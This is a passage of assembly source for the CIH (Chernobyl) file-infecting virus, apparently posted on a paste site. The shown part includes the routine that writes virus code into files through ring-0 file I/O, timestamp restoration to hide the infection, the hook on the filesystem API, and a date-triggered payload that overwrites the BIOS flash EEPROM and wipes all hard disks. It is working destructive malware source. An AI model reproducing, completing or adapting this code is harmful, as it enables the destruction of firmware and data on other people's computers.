  1025. LoopOfWriteVirusCodeToFile:
  1026.  
  1027. pop ecx
  1028. jecxz SetFileModificationMark
  1029.  
  1030. mov esi, ecx
  1031. mov eax, 0d601h
  1032. pop edx
  1033. pop ecx
  1034.  
  1035. call edi ; VXDCall IFSMgr_Ring0_FileIO
  1036.  
  1037. jmp LoopOfWriteVirusCodeToFile
  1038.  
  1039. ; ***************************
  1040. ; * Let's Set CF = 1 ==> *
  1041. ; * Need to Restore File *
  1042. ; * Modification Time *
  1043. ; ***************************
  1044.  
  1045. SetFileModificationMark:
  1046. pop ebx
  1047. pop eax
  1048.  
  1049. stc ; Enable CF(Carry Flag)
  1050. pushf
  1051.  
  1052. ; *************************************
  1053. ; * Close File *
  1054. ; *************************************
  1055.  
  1056. CloseFile:
  1057. xor eax, eax
  1058. mov ah, 0d7h
  1059. call edi ; VXDCall IFSMgr_Ring0_FileIO
  1060.  
  1061. ; *************************************
  1062. ; * Need to Restore File Modification *
  1063. ; * Time !? *
  1064. ; *************************************
  1065.  
  1066. popf
  1067. pop esi
  1068. jnc IsKillComputer
  1069.  
  1070. ; *************************************
  1071. ; * Restore File Modification Time *
  1072. ; *************************************
  1073.  
  1074. mov ebx, edi
  1075.  
  1076. mov ax, 4303h
  1077. mov ecx, (FileModificationTime-@7)[esi]
  1078. mov edi, (FileModificationTime+2-@7)[esi]
  1079. call ebx ; VXDCall IFSMgr_Ring0_FileIO
  1080.  
  1081. ; *************************************
  1082. ; * Disable OnBusy *
  1083. ; *************************************
  1084.  
  1085. DisableOnBusy:
  1086. dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
  1087.  
  1088. ; *************************************
  1089. ; * Call Previous FileSystemApiHook *
  1090. ; *************************************
  1091.  
  1092. prevhook:
  1093. popad
  1094.  
  1095. mov eax, dr0 ;
  1096. jmp [eax] ; Jump to prevhook
  1097.  
  1098. ; *************************************
  1099. ; * Call the Function that the IFS *
  1100. ; * Manager Would Normally Call to *
  1101. ; * Implement this Particular I/O *
  1102. ; * Request. *
  1103. ; *************************************
  1104.  
  1105. pIFSFunc:
  1106. mov ebx, esp
  1107. push dword ptr [ebx+20h+04h+14h] ; Push pioreq
  1108. call [ebx+20h+04h] ; Call pIFSFunc
  1109. pop ecx ;
  1110.  
  1111. mov [ebx+1ch], eax ; Modify EAX Value in Stack
  1112.  
  1113. ; ***************************
  1114. ; * After Calling pIFSFunc, *
  1115. ; * Get Some Data from the *
  1116. ; * Returned pioreq. *
  1117. ; ***************************
  1118.  
  1119. cmp dword ptr [ebx+20h+04h+04h], 00000024h
  1120. jne QuitMyVirusFileSystemHook
  1121.  
  1122. ; *****************
  1123. ; * Get the File *
  1124. ; * Modification *
  1125. ; * Date and Time *
  1126. ; * in DOS Format.*
  1127. ; *****************
  1128.  
  1129. mov eax, [ecx+28h]
  1130. mov (FileModificationTime-@6)[esi], eax
  1131.  
  1132. ; ***************************
  1133. ; * Quit My Virus' *
  1134. ; * IFSMgr_FileSystemHook *
  1135. ; ***************************
  1136.  
  1137. QuitMyVirusFileSystemHook:
  1138.  
  1139. popad
  1140.  
  1141. ret
  1142.  
  1143. ; *************************************
  1144. ; * Kill Computer !? ... *^_^* *
  1145. ; *************************************
  1146.  
  1147. IsKillComputer:
  1148. ; Get Now Day from BIOS CMOS
  1149. mov al, 07h
  1150. out 70h, al
  1151. in al, 71h
  1152.  
  1153. xor al, 26h ; ??/26/????
  1154.  
  1155. IF DEBUG
  1156. jmp DisableOnBusy
  1157. ELSE
  1158. jnz DisableOnBusy
  1159. ENDIF
  1160.  
  1161. ; **************************************
  1162. ; * Kill Kill Kill Kill Kill Kill Kill *
  1163. ; * Kill Kill Kill Kill Kill Kill Kill *
  1164. ; * Kill Kill Kill Kill Kill Kill Kill *
  1165. ; * Kill Kill Kill Kill Kill Kill Kill *
  1166. ; * Kill Kill Kill Kill Kill Kill Kill *
  1167. ; * Kill Kill Kill Kill Kill Kill Kill *
  1168. ; * Kill Kill Kill Kill Kill Kill Kill *
  1169. ; * Kill Kill Kill Kill Kill Kill Kill *
  1170. ; * Kill Kill Kill Kill Kill Kill Kill *
  1171. ; * Kill Kill Kill Kill Kill Kill Kill *
  1172. ; * Kill Kill Kill Kill Kill Kill Kill *
  1173. ; * Kill Kill Kill Kill Kill Kill Kill *
  1174. ; * Kill Kill Kill Kill Kill Kill Kill *
  1175. ; * Kill Kill Kill Kill Kill Kill Kill *
  1176. ; * Kill Kill Kill Kill Kill Kill Kill *
  1177. ; * Kill Kill Kill Kill Kill Kill Kill *
  1178. ; * Kill Kill Kill Kill Kill Kill Kill *
  1179. ; * Kill Kill Kill Kill Kill Kill Kill *
  1180. ; **************************************
  1181.  
  1182. ; ***************************
  1183. ; * Kill BIOS EEPROM *
  1184. ; ***************************
  1185.  
  1186. mov bp, 0cf8h
  1187. lea esi, IOForEEPROM-@7[esi]
  1188.  
  1189. ; ***********************
  1190. ; * Show BIOS Page in *
  1191. ; * 000E0000 - 000EFFFF *
  1192. ; * ( 64 KB ) *
  1193. ; ***********************
  1194.  
  1195. mov edi, 8000384ch
  1196. mov dx, 0cfeh
  1197. cli
  1198. call esi
  1199.  
  1200. ; ***********************
  1201. ; * Show BIOS Page in *
  1202. ; * 000F0000 - 000FFFFF *
  1203. ; * ( 64 KB ) *
  1204. ; ***********************
  1205.  
  1206. mov di, 0058h
  1207. dec edx ; and al,0fh
  1208. mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
  1209. call esi
  1210.  
  1211. ; ***********************
  1212. ; * Show the BIOS Extra *
  1213. ; * ROM Data in Memory *
  1214. ; * 000E0000 - 000E01FF *
  1215. ; * ( 512 Bytes ) *
  1216. ; * , and the Section *
  1217. ; * of Extra BIOS can *
  1218. ; * be Writted... *
  1219. ; ***********************
  1220.  
  1221. lea ebx, EnableEEPROMToWrite-@10[esi]
  1222.  
  1223. mov eax, 0e5555h
  1224. mov ecx, 0e2aaah
  1225. call ebx
  1226. mov byte ptr [eax], 60h
  1227.  
  1228. push ecx
  1229. loop $
  1230.  
  1231. ; ***********************
  1232. ; * Kill the BIOS Extra *
  1233. ; * ROM Data in Memory *
  1234. ; * 000E0000 - 000E007F *
  1235. ; * ( 80h Bytes ) *
  1236. ; ***********************
  1237.  
  1238. xor ah, ah
  1239. mov [eax], al
  1240.  
  1241. xchg ecx, eax
  1242. loop $
  1243.  
  1244. ; ***********************
  1245. ; * Show and Enable the *
  1246. ; * BIOS Main ROM Data *
  1247. ; * 000E0000 - 000FFFFF *
  1248. ; * ( 128 KB ) *
  1249. ; * can be Writted... *
  1250. ; ***********************
  1251.  
  1252. mov eax, 0f5555h
  1253. pop ecx
  1254. mov ch, 0aah
  1255. call ebx
  1256. mov byte ptr [eax], 20h
  1257.  
  1258. loop $
  1259.  
  1260. ; ***********************
  1261. ; * Kill the BIOS Main *
  1262. ; * ROM Data in Memory *
  1263. ; * 000FE000 - 000FE07F *
  1264. ; * ( 80h Bytes ) *
  1265. ; ***********************
  1266.  
  1267. mov ah, 0e0h
  1268. mov [eax], al
  1269.  
  1270. ; ***********************
  1271. ; * Hide BIOS Page in *
  1272. ; * 000F0000 - 000FFFFF *
  1273. ; * ( 64 KB ) *
  1274. ; ***********************
  1275. ; or al,10h
  1276. mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
  1277. call esi
  1278.  
  1279. ; ***************************
  1280. ; * Kill All HardDisk *
  1281. ; ***************************************************
  1282. ; * IOR Structure of IOS_SendCommand Needs *
  1283. ; ***************************************************
  1284. ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
  1285. ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
  1286. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1287. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1288. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
  1289. ; ***************************************************
  1290.  
  1291. KillHardDisk:
  1292. xor ebx, ebx
  1293. mov bh, FirstKillHardDiskNumber
  1294. push ebx
  1295. sub esp, 2ch
  1296. push 0c0001000h
  1297. mov bh, 08h
  1298. push ebx
  1299. push ecx
  1300. push ecx
  1301. push ecx
  1302. push 40000501h
  1303. inc ecx
  1304. push ecx
  1305. push ecx
  1306.  
  1307. mov esi, esp
  1308. sub esp, 0ach
  1309.  
  1310. LoopOfKillHardDisk:
  1311. int 20h
  1312. dd 00100004h ; VXDCall IOS_SendCommand
  1313.  
  1314. cmp word ptr [esi+06h], 0017h
  1315. je KillNextDataSection
  1316.  
  1317. ChangeNextHardDisk:
  1318. inc byte ptr [esi+4dh]
  1319.  
  1320. jmp LoopOfKillHardDisk
  1321.  
  1322. KillNextDataSection:
  1323. add dword ptr [esi+10h], ebx
  1324. mov byte ptr [esi+4dh], FirstKillHardDiskNumber
  1325.  
  1326. jmp LoopOfKillHardDisk
  1327.  
  1328. ; ***************************
  1329. ; * Enable EEPROM to Write *
  1330. ; ***************************
  1331.  
  1332. EnableEEPROMToWrite:
  1333. mov [eax], cl
  1334. mov [ecx], al
  1335. mov byte ptr [eax], 80h
  1336. mov [eax], cl
  1337. mov [ecx], al
  1338.  
  1339. ret
  1340.  
  1341. ; ***************************
  1342. ; * IO for EEPROM *
  1343. ; ***************************
  1344.  
  1345. IOForEEPROM:
  1346. @10 = IOForEEPROM
  1347.  
  1348. xchg eax, edi
  1349. xchg edx, ebp
  1350. out dx, eax
  1351.  
  1352. xchg eax, edi
  1353. xchg edx, ebp
  1354. in al, dx
  1355.  
  1356. BooleanCalculateCode = $
  1357. or al, 44h
  1358.  
  1359. xchg eax, edi
  1360. xchg edx, ebp
  1361. out dx, eax
  1362.  
  1363. xchg eax, edi
  1364. xchg edx, ebp
  1365. out dx, al
  1366.  
  1367. ret
  1368.  
  1369. ; *********************************************************
  1370. ; * Static Data *
  1371. ; *********************************************************
  1372.  
  1373. LastVxDCallAddress = IFSMgr_Ring0_FileIO
  1374. VxDCallAddressTable db 00h
  1375. db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
  1376. db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
  1377. db IFSMgr_Ring0_FileIO-UniToBCSPath
  1378.  
  1379. VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
  1380. VxDCallTableSize = ($-VxDCallIDTable)/04h
  1381.  
  1382. ; *********************************************************
  1383. ; * Virus Version Copyright *
  1384. ; *********************************************************
  1385.  
  1386. VirusVersionCopyright db 'CIH v'
  1387. db MajorVirusVersion+'0'
  1388. db '.'
  1389. db MinorVirusVersion+'0'
  1390. db ' TATUNG'
  1391.  
  1392. ; *********************************************************
  1393. ; * Virus Size *
  1394. ; *********************************************************
  1395.  
  1396. VirusSize = $
  1397. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1398. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1399. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1400.  
  1401. ; *********************************************************
  1402. ; * Dynamic Data *
  1403. ; *********************************************************
  1404.  
  1405. VirusGameDataStartAddress = VirusSize
  1406. @6 = VirusGameDataStartAddress
  1407. OnBusy db 0
  1408. FileModificationTime dd ?
  1409.  
  1410. FileNameBuffer db FileNameBufferSize dup(?)
  1411. @7 = FileNameBuffer
  1412.  
  1413. DataBuffer = $
  1414. @8 = DataBuffer
  1415. NumberOfSections dw ?
  1416. TimeDateStamp dd ?
  1417. SymbolsPointer dd ?
  1418. NumberOfSymbols dd ?
  1419. SizeOfOptionalHeader dw ?
  1420. _Characteristics dw ?
  1421. Magic dw ?
  1422. LinkerVersion dw ?
  1423. SizeOfCode dd ?
  1424. SizeOfInitializedData dd ?
  1425. SizeOfUninitializedData dd ?
  1426. AddressOfEntryPoint dd ?
  1427. BaseOfCode dd ?
  1428. BaseOfData dd ?
  1429. ImageBase dd ?
  1430. @9 = $
  1431. SectionAlignment dd ?
  1432. FileAlignment dd ?
  1433. OperatingSystemVersion dd ?
  1434. ImageVersion dd ?
  1435. SubsystemVersion dd ?
  1436. Reserved dd ?
  1437. SizeOfImage dd ?
  1438. SizeOfHeaders dd ?
  1439. SizeOfImageHeaderToRead = $-NumberOfSections
  1440.  
  1441. NewAddressOfEntryPoint = DataBuffer ; DWORD
  1442. SizeOfImageHeaderToWrite = 04h
  1443.  
  1444. StartOfSectionTable = @9
  1445. SectionName = StartOfSectionTable ; QWORD
  1446. VirtualSize = StartOfSectionTable+08h ; DWORD
  1447. VirtualAddress = StartOfSectionTable+0ch ; DWORD
  1448. SizeOfRawData = StartOfSectionTable+10h ; DWORD
  1449. PointerToRawData = StartOfSectionTable+14h ; DWORD
  1450. PointerToRelocations = StartOfSectionTable+18h ; DWORD
  1451. PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
  1452. NumberOfRelocations = StartOfSectionTable+20h ; WORD
  1453. NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
  1454. Characteristics = StartOfSectionTable+24h ; DWORD
  1455. SizeOfScetionTable = Characteristics+04h-SectionName
  1456.  
  1457. ; *********************************************************
  1458. ; * Virus Total Need Memory *
  1459. ; *********************************************************
  1460.  
  1461. VirusNeedBaseMemory = $
  1462.  
  1463. VirusTotalNeedMemory = @9
  1464. ; + NumberOfSections(??)*SizeOfScetionTable(28h)
  1465. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1466. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1467. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1468.  
  1469. ; *********************************************************
  1470. ; *********************************************************
  1471.  
  1472. VirusGame ENDS
  1473.  
  1474. END FileHeader
Add Comment
Please, Sign In to add comment